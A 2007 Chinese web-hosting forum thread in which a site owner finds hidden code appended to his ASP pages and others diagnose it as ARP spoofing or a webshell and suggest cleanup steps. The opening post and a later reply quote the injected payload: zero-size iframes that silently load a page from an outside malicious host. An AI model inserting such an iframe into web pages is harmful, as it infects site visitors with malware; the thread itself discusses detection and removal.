ysdl

我今天发现我的电脑提示打开的网站有木马，我把default，admin等文件下载下来一看，后面都被加上下面代码!
是什么原因？？希望大家指点一下！

End If
%><iframe src=http://www.18dmm.com/dm/kehu0723.htm width=0 height=0></iframe><iframe src=http://www.18dmm.com/dm/kehu0723.htm width=0 height=0></iframe>

J.wei

服务器中毒了，我的动网论坛也经常这样，建议把服务器补丁全打上，好像是ANI漏洞的补丁，忘记了，网上查查很多的，空间原因

Zx.MYS

备份数据库和重要文件（这些重要文件如果是.asp,.asa,.html,.jsp,.js,.xhtml,.shtml,.php,.cgi,.xml等等后缀名（可以输出网页的文件）需要手动或用杀毒软件删掉病毒），然后服务器彻底地杀毒，最好是格一遍，然后再装Z-BLOG。

如果是虚拟主机，没这么麻烦，要求服务商杀毒并赔偿损失

当然……自己的电脑先查毒，也有可能是你传上去之前时候在你电脑上被感染的。

Google

经典老问题。
非程序原因， 是服务器遭ARP欺骗，服务器下的站点全部挂马。

解决方法：
联系空间商，解决ARP欺骗问题，删除相关页面 iframe 代码，至此问题解决。


清楚了吗？ 赶快去叼你空间商去。

Google

ARP欺骗 杀毒软件是查杀不到的，只有空间商提高网络安全意识，做好ARP欺骗防范才是正道。
如果你空间商连ARP欺骗都不知道是什么，叫他滚回南泥湾种田去吧。

Google

http://www.baidu.com/s?wd=arp%c6 ... 8dmm%2ecom&cl=3

J.wei

哈哈，Google最后一句说了经典

Zx.MYS

不一定是ARP欺骗啊。
挂马的方法超级多的。

Google

引用:

原帖由 Zx.MYS 于 2007-6-5 17:41 发表
不一定是ARP欺骗啊。
挂马的方法超级多的。

挂马方法当然多，但具体问题具体分析

你看1楼的：
<iframe src=http://www.18dmm.com/dm/kehu0723.htm width=0 height=0></iframe>

再打开6楼的网址就知道了。
http://www.baidu.com/s?wd=arp%c6%db%c6%ad+www%2e18dmm%2ecom&cl=3

18dmm 就拿手ARP这一套。

Zx.MYS

晕。专业的ARP啊。

[ 本帖最后由 Zx.MYS 于 2007-6-7 21:45 编辑 ]

zoo

他娘的，原来是服务器中招了啊
日，明天就去找他们算帐！

dianso

被挂马了,把空间里的webshell删掉,然后看看是不是服务器被拿下了.